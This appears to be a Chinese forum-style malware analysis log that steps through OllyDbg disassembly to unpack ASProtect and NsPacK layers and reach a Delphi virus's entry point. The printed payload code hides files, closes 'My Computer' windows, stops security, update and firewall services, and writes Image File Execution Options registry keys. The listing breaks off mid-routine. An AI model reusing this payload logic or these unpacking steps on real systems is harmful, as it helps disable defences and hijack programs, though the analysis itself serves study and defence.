00DBFA55 B8 1F000000 mov eax, 1F
00DBFA5A E8 652EFCFF call 00D828C4
00DBFA5F C1E0 02 shl eax, 2
00DBFA62 2BF0 sub esi, eax
00DBFA64 E8 33EBFFFF call 00DBE59C
00DBFA69 833B 00 cmp dword ptr ds:[ebx], 0
00DBFA6C 74 05 je short 00DBFA73
00DBFA6E A3 8CB6DC00 mov dword ptr ds:[DCB68C], eax
00DBFA73 8B13 mov edx, dword ptr ds:[ebx]
00DBFA75 891424 mov dword ptr ss:[esp], edx
00DBFA78 897424 08 mov dword ptr ss:[esp+8], esi
00DBFA7C 894424 0C mov dword ptr ss:[esp+C], eax
00DBFA80 A1 9C2BDC00 mov eax, dword ptr ds:[DC2B9C]
00DBFA85 C600 E1 mov byte ptr ds:[eax], 0E1
00DBFA88 A1 58B6DC00 mov eax, dword ptr ds:[DCB658]
00DBFA8D E8 EE5DFFFF call 00DB5880
00DBFA92 A1 88B6DC00 mov eax, dword ptr ds:[DCB688]
00DBFA97 894424 04 mov dword ptr ss:[esp+4], eax
00DBFA9B 897C24 10 mov dword ptr ss:[esp+10], edi
00DBFA9F A1 242BDC00 mov eax, dword ptr ds:[DC2B24]
00DBFAA4 8B00 mov eax, dword ptr ds:[eax]
00DBFAA6 E8 6931FCFF call 00D82C14
00DBFAAB A1 58B6DC00 mov eax, dword ptr ds:[DCB658]
00DBFAB0 E8 5F31FCFF call 00D82C14
00DBFAB5 A1 9C2BDC00 mov eax, dword ptr ds:[DC2B9C]
00DBFABA C600 E3 mov byte ptr ds:[eax], 0E3
00DBFABD 8BD4 mov edx, esp
00DBFABF A1 94B6DC00 mov eax, dword ptr ds:[DCB694]
00DBFAC4 E8 23B9FFFF call 00DBB3EC
00DBFAC9 E8 8E3CFFFF call 00DB375C
00DBFACE E8 61EDFFFF call 00DBE834 ; f4,f8只是跟着做,好像是说三个call相近
00DBE834 /65:EB 01 jmp short 00DBE838 ; 到这后看到一片红 ctrl+f9运行到返回
00DBE837 |C783 D16A13CD B>mov dword ptr ds:[ebx+CD136AD1], 49F>
00DBE841 0003 add byte ptr ds:[ebx], al
00DBE843 4C dec esp
00DBE844 24 18 and al, 18
00DBE846 B9 46624900 mov ecx, 496246
00DBE84B B9 FE224A00 mov ecx, 4A22FE
00DBE850 8D8C22 00000000 lea ecx, dword ptr ds:[edx]
00DBE857 EB 02 jmp short 00DBE85B
00DBE859 CD20 2BCA85C9 vxdjump C985CA2B
00DBE85F 0F85 E7000000 jnz 00DBE94C
00DBE865 C1DA 13 rcr edx, 13
\\\\\\\\\\\\\\\\\、、、、、省略、、、、、、、、、、、、、
01F80000 0FB7F7 movzx esi, di ;停在这里
01F80003 66:81D2 BD25 adc dx, 25BD
01F80008 E8 07000000 call 01F80014 ; 进
01F80014 0FB7FF movzx edi, di ; 往后就和教程不一样了,我试了只能见call进
01F80017 5B pop ebx
01F80018 BF B0ABA72B mov edi, 2BA7ABB0
01F8001D 81C3 31010000 add ebx, 131
01F80023 68 4FCB957B push 7B95CB4F
01F80028 0F8A 02000000 jpe 01F80030
01F8002E 52 push edx
01F8002F 5A pop edx
01F80030 5E pop esi
01F80031 81DE 0CAB9F6B sbb esi, 6B9FAB0C
01F80037 68 6A76D65A push 5AD6766A
01F8003C 66:BE 379E mov si, 9E37
01F80040 5E pop esi
01F80041 B9 0B000000 mov ecx, 0B
01F80046 0F82 05000000 jb 01F80051
01F8004C BF 3CEFE942 mov edi, 42E9EF3C
01F80051 E8 0F000000 call 01F80065 ; 进
01F80065 68 58468310 push 10834658
01F8006A 66:BF 9CBB mov di, 0BB9C
01F8006E 56 push esi
01F8006F 5F pop edi
01F80070 5F pop edi
01F80071 5E pop esi
01F80072 FF33 push dword ptr ds:[ebx]
01F80074 E8 05000000 call 01F8007E ; 进
01F8007E 50 push eax ; 到这
01F8007F 68 CD126831 push 316812CD
01F80084 5E pop esi
01F80085 5F pop edi
01F80086 5A pop edx
01F80087 58 pop eax
01F80088 66:BF A634 mov di, 34A6
01F8008C 81C6 00BC791E add esi, 1E79BC00
01F80092 81F0 77226445 xor eax, 45642277
01F80098 8BF2 mov esi, edx
01F8009A 81F0 E41E2D6D xor eax, 6D2D1EE4
01F800A0 66:8BF7 mov si, di
01F800A3 51 push ecx
01F800A4 0FBFF9 movsx edi, cx
01F800A7 53 push ebx
01F800A8 5F pop edi
01F800A9 5E pop esi
01F800AA 8BD1 mov edx, ecx
01F800AC 81F0 4DCFF703 xor eax, 3F7CF4D
01F800B2 66:81E6 78F5 and si, 0F578
01F800B7 E9 0B000000 jmp 01F800C7 ; 跳下
01F800C7 8903 mov dword ptr ds:[ebx], eax
01F800C9 BA 66F70029 mov edx, 2900F766
01F800CE 83EB 02 sub ebx, 2
01F800D1 4B dec ebx
01F800D2 4B dec ebx
01F800D3 BE BBAE5C5E mov esi, 5E5CAEBB
01F800D8 66:8BF3 mov si, bx
01F800DB 8BF0 mov esi, eax
01F800DD 49 dec ecx
01F800DE ^ 0F85 8EFFFFFF jnz 01F80072 ; 跳上
01F800E4 53 push ebx ; 上边是个循环,下断这里
01F800E5 E8 0E000000 call 01F800F8 ; F7
01F800F8 81CF 0502666D or edi, 6D660205 ; 到这里
01F800FE E8 10000000 call 01F80113 ; 进
01F80113 5E pop esi ; 01F80103
01F80114 5A pop edx
01F80115 5E pop esi
01F80116 EB 01 jmp short 01F80119 ; 跳
01F80119 83CB EF or ebx, FFFFFFEF
01F8011C 035C24 18 add ebx, dword ptr ss:[esp+18]
01F80120 5B pop ebx
01F80121 8D4447 2D lea eax, dword ptr ds:[edi+eax*2+2D]
01F80125 58 pop eax
01F80126 EB 02 jmp short 01F8012A
01F8012A 8D80 9004BE3B lea eax, dword ptr ds:[eax+3BBE0490]
01F80130 03C3 add eax, ebx
01F80132 5C pop esp
01F80133 FFE0 jmp near eax ; call来跳去的不过还好最后还是出来了;
跳出了aspr.
\\\\\\\\\\\\\\\\\\\\\又跳进一个壳NsPacK,首次遇上,找了个例子借鉴\\\\\
0041A3D3 9C pushfd ; 就是这,开始我还以为这就是oep,还想可能因为
0041A3D4 60 pushad ; 是病毒,有点别扭,本以为脱aspr是要修复iat的
0041A3D5 E8 00000000 call 0041A3DA ; 没想到dump下来一看又是一个壳,
0041A3DA 5D pop ebp
0041A3DB 83ED 07 sub ebp, 7
0041A3DE 8D8D A9FCFFFF lea ecx, dword ptr ss:[ebp-357]
0041A3E4 8039 01 cmp byte ptr ds:[ecx], 1
0041A3E7 0F84 42020000 je 0041A62F
0041A3ED C601 01 mov byte ptr ds:[ecx], 1
0041A3F0 8BC5 mov eax, ebp
0041A3F2 2B85 3DFCFFFF sub eax, dword ptr ss:[ebp-3C3]
0041A3F8 8985 3DFCFFFF mov dword ptr ss:[ebp-3C3], eax
0041A3FE 0185 6DFCFFFF add dword ptr ss:[ebp-393], eax
0041A404 8DB5 B1FCFFFF lea esi, dword ptr ss:[ebp-34F]
0041A40A 0106 add dword ptr ds:[esi], eax
0041A40C 55 push ebp
0041A40D 56 push esi
0041A40E 6A 40 push 40
0041A410 68 00100000 push 1000
0041A415 68 00100000 push 1000
0041A41A 6A 00 push 0
0041A41C FF95 D5FCFFFF call near dword ptr ss:[ebp-32B]
0041A422 85C0 test eax, eax
0041A424 0F84 69030000 je 0041A793
0041A42A 8985 65FCFFFF mov dword ptr ss:[ebp-39B], eax
0041A430 E8 00000000 call 0041A435
0041A435 5B pop ebx
0041A436 B9 67030000 mov ecx, 367
0041A43B 03D9 add ebx, ecx
0041A43D 50 push eax
0041A43E 53 push ebx
0041A43F E8 B0020000 call 0041A6F4
0041A444 5E pop esi
0041A445 5D pop ebp
0041A446 8B36 mov esi, dword ptr ds:[esi]
0041A448 8BFD mov edi, ebp
0041A44A 03BD 2DFCFFFF add edi, dword ptr ss:[ebp-3D3]
0041A450 8BDF mov ebx, edi
0041A452 833F 00 cmp dword ptr ds:[edi], 0
0041A455 75 0A jnz short 0041A461
0041A457 83C7 04 add edi, 4
0041A45A B9 00000000 mov ecx, 0
0041A45F EB 16 jmp short 0041A477
0041A461 B9 01000000 mov ecx, 1
0041A466 033B add edi, dword ptr ds:[ebx]
0041A468 83C3 04 add ebx, 4
0041A46B 833B 00 cmp dword ptr ds:[ebx], 0
0041A46E 74 34 je short 0041A4A4
0041A470 0113 add dword ptr ds:[ebx], edx
0041A472 8B33 mov esi, dword ptr ds:[ebx]
0041A474 037B 04 add edi, dword ptr ds:[ebx+4]
0041A477 57 push edi
0041A478 51 push ecx
0041A479 53 push ebx
0041A47A FFB5 D9FCFFFF push dword ptr ss:[ebp-327]
0041A480 FFB5 D5FCFFFF push dword ptr ss:[ebp-32B]
0041A486 8BD6 mov edx, esi
0041A488 8BCF mov ecx, edi
0041A48A 8B85 65FCFFFF mov eax, dword ptr ss:[ebp-39B]
0041A490 05 AA050000 add eax, 5AA
0041A495 FFD0 call near eax
0041A497 5B pop ebx
0041A498 59 pop ecx
0041A499 5F pop edi
0041A49A 83F9 00 cmp ecx, 0
0041A49D 74 05 je short 0041A4A4
0041A49F 83C3 08 add ebx, 8
0041A4A2 ^ EB C7 jmp short 0041A46B
0041A4A4 68 00800000 push 8000
0041A4A9 6A 00 push 0
0041A4AB FFB5 65FCFFFF push dword ptr ss:[ebp-39B]
0041A4B1 FF95 D9FCFFFF call near dword ptr ss:[ebp-327]
0041A4B7 8DB5 6DFCFFFF lea esi, dword ptr ss:[ebp-393]
0041A4BD 8B4E 08 mov ecx, dword ptr ds:[esi+8]
0041A4C0 8D56 10 lea edx, dword ptr ds:[esi+10]
0041A4C3 8B36 mov esi, dword ptr ds:[esi]
0041A4C5 8BFE mov edi, esi
0041A4C7 83F9 00 cmp ecx, 0
0041A4CA 74 3F je short 0041A50B
0041A4CC 8A07 mov al, byte ptr ds:[edi]
0041A4CE 47 inc edi
0041A4CF 2C E8 sub al, 0E8
0041A4D1 3C 01 cmp al, 1
0041A4D3 ^ 77 F7 ja short 0041A4CC
0041A4D5 8B07 mov eax, dword ptr ds:[edi]
0041A4D7 807A 01 00 cmp byte ptr ds:[edx+1], 0
0041A4DB 74 14 je short 0041A4F1
0041A4DD 8A1A mov bl, byte ptr ds:[edx]
0041A4DF 381F cmp byte ptr ds:[edi], bl
0041A4E1 ^ 75 E9 jnz short 0041A4CC
0041A4E3 8A5F 04 mov bl, byte ptr ds:[edi+4]
0041A4E6 66:C1E8 08 shr ax, 8
0041A4EA C1C0 10 rol eax, 10
0041A4ED 86C4 xchg ah, al
0041A4EF EB 0A jmp short 0041A4FB
0041A4F1 8A5F 04 mov bl, byte ptr ds:[edi+4]
0041A4F4 86C4 xchg ah, al
0041A4F6 C1C0 10 rol eax, 10
0041A4F9 86C4 xchg ah, al
0041A4FB 2BC7 sub eax, edi
0041A4FD 03C6 add eax, esi
0041A4FF 8907 mov dword ptr ds:[edi], eax
0041A501 83C7 05 add edi, 5
0041A504 80EB E8 sub bl, 0E8
0041A507 8BC3 mov eax, ebx
0041A509 ^ E2 C6 loopd short 0041A4D1
0041A50B E8 3A010000 call 0041A64A
0041A510 8D8D 81FCFFFF lea ecx, dword ptr ss:[ebp-37F]
0041A516 8B41 08 mov eax, dword ptr ds:[ecx+8]
0041A519 83F8 00 cmp eax, 0
0041A51C 0F84 81000000 je 0041A5A3
0041A522 8BF2 mov esi, edx
0041A524 2B71 10 sub esi, dword ptr ds:[ecx+10]
0041A527 74 7A je short 0041A5A3
0041A529 8971 10 mov dword ptr ds:[ecx+10], esi
0041A52C 8DB5 B1FCFFFF lea esi, dword ptr ss:[ebp-34F]
0041A532 8B36 mov esi, dword ptr ds:[esi]
0041A534 8D5E FC lea ebx, dword ptr ds:[esi-4]
0041A537 8B01 mov eax, dword ptr ds:[ecx]
0041A539 83F8 01 cmp eax, 1
0041A53C 74 0A je short 0041A548
0041A53E 8BFA mov edi, edx
0041A540 0379 08 add edi, dword ptr ds:[ecx+8]
0041A543 8B49 10 mov ecx, dword ptr ds:[ecx+10]
0041A546 EB 08 jmp short 0041A550
0041A548 8BFE mov edi, esi
0041A54A 0379 08 add edi, dword ptr ds:[ecx+8]
0041A54D 8B49 10 mov ecx, dword ptr ds:[ecx+10]
0041A550 33C0 xor eax, eax
0041A552 8A07 mov al, byte ptr ds:[edi]
0041A554 47 inc edi
0041A555 0BC0 or eax, eax
0041A557 74 20 je short 0041A579
0041A559 3C EF cmp al, 0EF
0041A55B 77 06 ja short 0041A563
0041A55D 03D8 add ebx, eax
0041A55F 010B add dword ptr ds:[ebx], ecx
0041A561 ^ EB ED jmp short 0041A550
0041A563 24 0F and al, 0F
0041A565 C1E0 10 shl eax, 10
0041A568 66:8B07 mov ax, word ptr ds:[edi]
0041A56B 83C7 02 add edi, 2
0041A56E 0BC0 or eax, eax
0041A570 ^ 75 EB jnz short 0041A55D
0041A572 8B07 mov eax, dword ptr ds:[edi]
0041A574 83C7 04 add edi, 4
0041A577 ^ EB E4 jmp short 0041A55D
0041A579 33DB xor ebx, ebx
0041A57B 87FE xchg esi, edi
0041A57D 8B06 mov eax, dword ptr ds:[esi]
0041A57F 83F8 00 cmp eax, 0
0041A582 74 1F je short 0041A5A3
0041A584 AD lodsd
0041A585 0BC0 or eax, eax
0041A587 74 08 je short 0041A591
0041A589 03D8 add ebx, eax
0041A58B 66:010C1F add word ptr ds:[edi+ebx], cx
0041A58F ^ EB F3 jmp short 0041A584
0041A591 33DB xor ebx, ebx
0041A593 C1E9 10 shr ecx, 10
0041A596 AD lodsd
0041A597 0BC0 or eax, eax
0041A599 74 08 je short 0041A5A3
0041A59B 03D8 add ebx, eax
0041A59D 66:010C1F add word ptr ds:[edi+ebx], cx
0041A5A1 ^ EB F3 jmp short 0041A596
0041A5A3 8DB5 3DFCFFFF lea esi, dword ptr ss:[ebp-3C3]
0041A5A9 8B16 mov edx, dword ptr ds:[esi]
0041A5AB 8DB5 99FCFFFF lea esi, dword ptr ss:[ebp-367]
0041A5B1 8A06 mov al, byte ptr ds:[esi]
0041A5B3 3C 01 cmp al, 1
0041A5B5 75 3F jnz short 0041A5F6
0041A5B7 0356 04 add edx, dword ptr ds:[esi+4]
0041A5BA 56 push esi
0041A5BB 52 push edx
0041A5BC 56 push esi
0041A5BD 6A 04 push 4
0041A5BF 68 00010000 push 100
0041A5C4 52 push edx
0041A5C5 FF95 D1FCFFFF call near dword ptr ss:[ebp-32F]
0041A5CB 5F pop edi
0041A5CC 5E pop esi
0041A5CD 83F8 01 cmp eax, 1
0041A5D0 0F85 BD010000 jnz 0041A793
0041A5D6 83C6 08 add esi, 8
0041A5D9 B9 08000000 mov ecx, 8
0041A5DE F3:A4 rep movsb
0041A5E0 83EE 0C sub esi, 0C
0041A5E3 83EF 08 sub edi, 8
0041A5E6 56 push esi
0041A5E7 FF76 FC push dword ptr ds:[esi-4]
0041A5EA 68 00010000 push 100
0041A5EF 57 push edi
0041A5F0 FF95 D1FCFFFF call near dword ptr ss:[ebp-32F]
0041A5F6 55 push ebp
0041A5F7 5B pop ebx
0041A5F8 81EB 15000000 sub ebx, 15
0041A5FE 33C9 xor ecx, ecx
0041A600 8A0B mov cl, byte ptr ds:[ebx]
0041A602 80F9 00 cmp cl, 0
0041A605 74 28 je short 0041A62F
0041A607 43 inc ebx
0041A608 8DB5 3DFCFFFF lea esi, dword ptr ss:[ebp-3C3]
0041A60E 8B16 mov edx, dword ptr ds:[esi]
0041A610 56 push esi
0041A611 51 push ecx
0041A612 53 push ebx
0041A613 52 push edx
0041A614 56 push esi
0041A615 FF33 push dword ptr ds:[ebx]
0041A617 FF73 04 push dword ptr ds:[ebx+4]
0041A61A 8B43 08 mov eax, dword ptr ds:[ebx+8]
0041A61D 03C2 add eax, edx
0041A61F 50 push eax
0041A620 FF95 D1FCFFFF call near dword ptr ss:[ebp-32F]
0041A626 5A pop edx
0041A627 5B pop ebx
0041A628 59 pop ecx
0041A629 5E pop esi
0041A62A 83C3 0C add ebx, 0C
0041A62D ^ E2 E1 loopd short 0041A610
0041A62F B8 00000000 mov eax, 0
0041A634 83F8 00 cmp eax, 0
0041A637 74 0A je short 0041A643
0041A639 61 popad
0041A63A 9D popfd
0041A63B B8 01000000 mov eax, 1
0041A640 C2 0C00 retn 0C
0041A643 61 popad
0041A644 9D popfd
0041A645 - E9 DE4CFFFF jmp 0040F328
; 第二个壳就不像借鉴的例子那样,一路f8,就跳向oep
也是直接dump下来的,没敢试运行一下,直接进od了,所以也不知道用不用修复。
不过看程序好像不用。
\\\\\\\\\\\\\\\\\\\\\\\千辛万苦终于让我给找到了,真想说找你不容易呀oep.\\\\\\\\
下面就是病毒源码了,先贴出来晒晒,还没开始跟呢,今天还发现虚拟机的好处了,不想跟了,可以保存现状,
、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、
peid查为Delphi的。
0040F328 >/$ 55 push ebp
0040F329 |. 8BEC mov ebp, esp
0040F32B |. B9 32000000 mov ecx, 32
0040F330 |> 6A 00 /push 0
0040F332 |. 6A 00 |push 0
0040F334 |. 49 |dec ecx
0040F335 |.^ 75 F9 \jnz short 0040F330
0040F337 |. 51 push ecx
0040F338 |. 53 push ebx
0040F339 |. 56 push esi
0040F33A |. 57 push edi
0040F33B |. B8 C0F24000 mov eax, 0040F2C0
0040F340 |. E8 1352FFFF call 00404558
0040F345 |. 8B3D 58144100 mov edi, dword ptr ds:[411458] ; 1.004113D8
0040F34B |. 33C0 xor eax, eax
0040F34D |. 55 push ebp
0040F34E |. 68 1E034100 push 0041031E
0040F353 |. 64:FF30 push dword ptr fs:[eax]
0040F356 |. 64:8920 mov dword ptr fs:[eax], esp
0040F359 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040F35E |. BA 04010000 mov edx, 104
0040F363 |. E8 584CFFFF call 00403FC0
0040F368 |. 68 04010000 push 104
0040F36D |. A1 34154100 mov eax, dword ptr ds:[411534]
0040F372 |. 8B00 mov eax, dword ptr ds:[eax]
0040F374 |. E8 1F4BFFFF call 00403E98
0040F379 |. 50 push eax ; |PathBuffer
0040F37A |. A1 50264100 mov eax, dword ptr ds:[412650] ; |
0040F37F |. 50 push eax ; |hModule => NULL
0040F380 |. E8 9753FFFF call <jmp.&kernel32.GetModuleFileName>; \GetModuleFileNameA
0040F385 |. 8BD0 mov edx, eax
0040F387 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040F38C |. E8 2F4CFFFF call 00403FC0
0040F391 |. E8 B28FFFFF call 00408348
0040F396 |. BE 17000000 mov esi, 17
0040F39B |. 8B1D 84144100 mov ebx, dword ptr ds:[411484] ; 1.004110CC
0040F3A1 |> A1 58154100 /mov eax, dword ptr ds:[411558]
0040F3A6 |. 8B13 |mov edx, dword ptr ds:[ebx]
0040F3A8 |. E8 BB47FFFF |call 00403B68
0040F3AD |. 8D55 EC |lea edx, dword ptr ss:[ebp-14]
0040F3B0 |. A1 34154100 |mov eax, dword ptr ds:[411534]
0040F3B5 |. 8B00 |mov eax, dword ptr ds:[eax]
0040F3B7 |. E8 4470FFFF |call 00406400
0040F3BC |. 8B45 EC |mov eax, dword ptr ss:[ebp-14]
0040F3BF |. 50 |push eax
0040F3C0 |. A1 58154100 |mov eax, dword ptr ds:[411558]
0040F3C5 |. FF30 |push dword ptr ds:[eax]
0040F3C7 |. A1 50154100 |mov eax, dword ptr ds:[411550]
0040F3CC |. FF30 |push dword ptr ds:[eax]
0040F3CE |. FF37 |push dword ptr ds:[edi]
0040F3D0 |. 8D45 E4 |lea eax, dword ptr ss:[ebp-1C]
0040F3D3 |. BA 03000000 |mov edx, 3
0040F3D8 |. E8 7B49FFFF |call 00403D58
0040F3DD |. 8B45 E4 |mov eax, dword ptr ss:[ebp-1C]
0040F3E0 |. 8D55 E8 |lea edx, dword ptr ss:[ebp-18]
0040F3E3 |. E8 1870FFFF |call 00406400
0040F3E8 |. 8B55 E8 |mov edx, dword ptr ss:[ebp-18]
0040F3EB |. 58 |pop eax
0040F3EC |. E8 F349FFFF |call 00403DE4
0040F3F1 |. 0F85 A5010000 |jnz 0040F59C
0040F3F7 |. 6A 01 |push 1
0040F3F9 |. 8D45 DC |lea eax, dword ptr ss:[ebp-24]
0040F3FC |. E8 D384FFFF |call 004078D4
0040F401 |. FF75 DC |push dword ptr ss:[ebp-24]
0040F404 |. 68 38034100 |push 00410338 ; ASCII "explorer.exe "
0040F409 |. A1 58154100 |mov eax, dword ptr ds:[411558]
0040F40E |. FF30 |push dword ptr ds:[eax]
0040F410 |. 8D45 E0 |lea eax, dword ptr ss:[ebp-20]
0040F413 |. BA 03000000 |mov edx, 3
0040F418 |. E8 3B49FFFF |call 00403D58
0040F41D |. 8B45 E0 |mov eax, dword ptr ss:[ebp-20]
0040F420 |. E8 734AFFFF |call 00403E98
0040F425 |. 50 |push eax ; |CmdLine
0040F426 |. E8 7953FFFF |call <jmp.&kernel32.WinExec> ; \WinExec
0040F42B |. 6A 00 |push 0 ; /lParam = 0
0040F42D |. 6A 00 |push 0 ; |wParam = 0
0040F42F |. 6A 10 |push 10 ; |Message = WM_CLOSE
0040F431 |. 68 48034100 |push 00410348 ; |/Title = "我的电脑"
0040F436 |. 6A 00 |push 0 ; ||Class = 0
0040F438 |. E8 8753FFFF |call <jmp.&user32.FindWindowA> ; |\FindWindowA
0040F43D |. 50 |push eax ; |hWnd
0040F43E |. E8 C953FFFF |call <jmp.&user32.PostMessageA> ; \PostMessageA
0040F443 |. 6A 00 |push 0 ; /lParam = 0
0040F445 |. 6A 00 |push 0 ; |wParam = 0
0040F447 |. 6A 10 |push 10 ; |Message = WM_CLOSE
0040F449 |. 68 54034100 |push 00410354 ; |/Title = "我的電腦"
0040F44E |. 6A 00 |push 0 ; ||Class = 0
0040F450 |. E8 6F53FFFF |call <jmp.&user32.FindWindowA> ; |\FindWindowA
0040F455 |. 50 |push eax ; |hWnd
0040F456 |. E8 B153FFFF |call <jmp.&user32.PostMessageA> ; \PostMessageA
0040F45B |. 6A 00 |push 0 ; /lParam = 0
0040F45D |. 6A 00 |push 0 ; |wParam = 0
0040F45F |. 6A 10 |push 10 ; |Message = WM_CLOSE
0040F461 |. 68 60034100 |push 00410360 ; |/Title = "My Computer"
0040F466 |. 6A 00 |push 0 ; ||Class = 0
0040F468 |. E8 5753FFFF |call <jmp.&user32.FindWindowA> ; |\FindWindowA
0040F46D |. 50 |push eax ; |hWnd
0040F46E |. E8 9953FFFF |call <jmp.&user32.PostMessageA> ; \PostMessageA
0040F473 |. 6A 06 |push 6
0040F475 |. A1 58154100 |mov eax, dword ptr ds:[411558]
0040F47A |. FF30 |push dword ptr ds:[eax]
0040F47C |. A1 50154100 |mov eax, dword ptr ds:[411550]
0040F481 |. FF30 |push dword ptr ds:[eax]
0040F483 |. FF37 |push dword ptr ds:[edi]
0040F485 |. 8D45 D8 |lea eax, dword ptr ss:[ebp-28]
0040F488 |. BA 03000000 |mov edx, 3
0040F48D |. E8 C648FFFF |call 00403D58
0040F492 |. 8B45 D8 |mov eax, dword ptr ss:[ebp-28]
0040F495 |. E8 FE49FFFF |call 00403E98
0040F49A |. 50 |push eax ; |FileName
0040F49B |. E8 EC52FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F4A0 |. 6A 06 |push 6
0040F4A2 |. 8B0D A4144100 |mov ecx, dword ptr ds:[4114A4] ; 1.004113E0
0040F4A8 |. 8B09 |mov ecx, dword ptr ds:[ecx]
0040F4AA |. 8B15 58154100 |mov edx, dword ptr ds:[411558] ; 1.004130F8
0040F4B0 |. 8B12 |mov edx, dword ptr ds:[edx]
0040F4B2 |. 8D45 D4 |lea eax, dword ptr ss:[ebp-2C]
0040F4B5 |. E8 2A48FFFF |call 00403CE4
0040F4BA |. 8B45 D4 |mov eax, dword ptr ss:[ebp-2C]
0040F4BD |. E8 D649FFFF |call 00403E98
0040F4C2 |. 50 |push eax ; |FileName
0040F4C3 |. E8 C452FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F4C8 |. 6A 06 |push 6
0040F4CA |. 8D45 D0 |lea eax, dword ptr ss:[ebp-30]
0040F4CD |. E8 B284FFFF |call 00407984
0040F4D2 |. 8D45 D0 |lea eax, dword ptr ss:[ebp-30]
0040F4D5 |. 8B15 B4144100 |mov edx, dword ptr ds:[4114B4] ; 1.004113D4
0040F4DB |. 8B12 |mov edx, dword ptr ds:[edx]
0040F4DD |. E8 BE47FFFF |call 00403CA0
0040F4E2 |. 8B45 D0 |mov eax, dword ptr ss:[ebp-30]
0040F4E5 |. E8 AE49FFFF |call 00403E98
0040F4EA |. 50 |push eax ; |FileName
0040F4EB |. E8 9C52FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F4F0 |. 6A 06 |push 6
0040F4F2 |. 8D45 C8 |lea eax, dword ptr ss:[ebp-38]
0040F4F5 |. E8 2685FFFF |call 00407A20
0040F4FA |. FF75 C8 |push dword ptr ss:[ebp-38]
0040F4FD |. A1 5C144100 |mov eax, dword ptr ds:[41145C]
0040F502 |. FF30 |push dword ptr ds:[eax]
0040F504 |. FF37 |push dword ptr ds:[edi]
0040F506 |. 8D45 CC |lea eax, dword ptr ss:[ebp-34]
0040F509 |. BA 03000000 |mov edx, 3
0040F50E |. E8 4548FFFF |call 00403D58
0040F513 |. 8B45 CC |mov eax, dword ptr ss:[ebp-34]
0040F516 |. E8 7D49FFFF |call 00403E98
0040F51B |. 50 |push eax ; |FileName
0040F51C |. E8 6B52FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F521 |. 6A 06 |push 6
0040F523 |. 8D45 C0 |lea eax, dword ptr ss:[ebp-40]
0040F526 |. E8 A585FFFF |call 00407AD0
0040F52B |. FF75 C0 |push dword ptr ss:[ebp-40]
0040F52E |. A1 3C154100 |mov eax, dword ptr ds:[41153C]
0040F533 |. FF30 |push dword ptr ds:[eax]
0040F535 |. FF37 |push dword ptr ds:[edi]
0040F537 |. 8D45 C4 |lea eax, dword ptr ss:[ebp-3C]
0040F53A |. BA 03000000 |mov edx, 3
0040F53F |. E8 1448FFFF |call 00403D58
0040F544 |. 8B45 C4 |mov eax, dword ptr ss:[ebp-3C]
0040F547 |. E8 4C49FFFF |call 00403E98
0040F54C |. 50 |push eax ; |FileName
0040F54D |. E8 3A52FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F552 |. 6A 06 |push 6
0040F554 |. 8D45 BC |lea eax, dword ptr ss:[ebp-44]
0040F557 |. E8 2884FFFF |call 00407984
0040F55C |. 8D45 BC |lea eax, dword ptr ss:[ebp-44]
0040F55F |. BA 74034100 |mov edx, 00410374 ; ASCII "Common Files\System"
0040F564 |. E8 3747FFFF |call 00403CA0
0040F569 |. 8B45 BC |mov eax, dword ptr ss:[ebp-44]
0040F56C |. E8 2749FFFF |call 00403E98
0040F571 |. 50 |push eax ; |FileName
0040F572 |. E8 1552FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F577 |. 6A 06 |push 6
0040F579 |. 8D45 B8 |lea eax, dword ptr ss:[ebp-48]
0040F57C |. E8 0384FFFF |call 00407984
0040F581 |. 8D45 B8 |lea eax, dword ptr ss:[ebp-48]
0040F584 |. BA 90034100 |mov edx, 00410390 ; ASCII "Common Files\Microsoft Shared"
0040F589 |. E8 1247FFFF |call 00403CA0
0040F58E |. 8B45 B8 |mov eax, dword ptr ss:[ebp-48]
0040F591 |. E8 0249FFFF |call 00403E98
0040F596 |. 50 |push eax ; |FileName
0040F597 |. E8 F051FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F59C |> 83C3 04 |add ebx, 4
0040F59F |. 4E |dec esi
0040F5A0 |.^ 0F85 FBFDFFFF \jnz 0040F3A1
0040F5A6 |. B8 B8034100 mov eax, 004103B8 ; ASCII "wscsvc"
0040F5AB |. E8 2087FFFF call 00407CD0
0040F5B0 |. B8 C8034100 mov eax, 004103C8 ; ASCII "helpsvc"
0040F5B5 |. E8 1687FFFF call 00407CD0
0040F5BA |. B8 D8034100 mov eax, 004103D8 ; ASCII "wuauserv"
0040F5BF |. E8 0C87FFFF call 00407CD0
0040F5C4 |. B8 EC034100 mov eax, 004103EC ; ASCII "SharedAccess"
0040F5C9 |. E8 0287FFFF call 00407CD0
0040F5CE |. 68 04044100 push 00410404 ; ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\"
0040F5D3 |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040F5D8 |. FF30 push dword ptr ds:[eax]
0040F5DA |. FF37 push dword ptr ds:[edi]
0040F5DC |. 8D45 B4 lea eax, dword ptr ss:[ebp-4C]
0040F5DF |. BA 03000000 mov edx, 3
0040F5E4 |. E8 6F47FFFF call 00403D58
0040F5E9 |. 8B55 B4 mov edx, dword ptr ss:[ebp-4C]
0040F5EC |. B8 02000080 mov eax, 80000002
0040F5F1 |. E8 3E76FFFF call 00406C34
0040F5F6 |. 68 04044100 push 00410404 ; ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\"
0040F5FB |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040F600 |. FF30 push dword ptr ds:[eax]
0040F602 |. FF37 push dword ptr ds:[edi]
0040F604 |. 8D45 B0 lea eax, dword ptr ss:[ebp-50]
0040F607 |. BA 03000000 mov edx, 3
0040F60C |. E8 4747FFFF call 00403D58
0040F611 |. 8B55 B0 mov edx, dword ptr ss:[ebp-50]
0040F614 |. B8 02000080 mov eax, 80000002
0040F619 |. E8 1676FFFF call 00406C34
0040F61E |. 8D55 AC lea edx, dword ptr ss:[ebp-54]
0040F621 |. A1 34154100 mov eax, dword ptr ds:[411534]
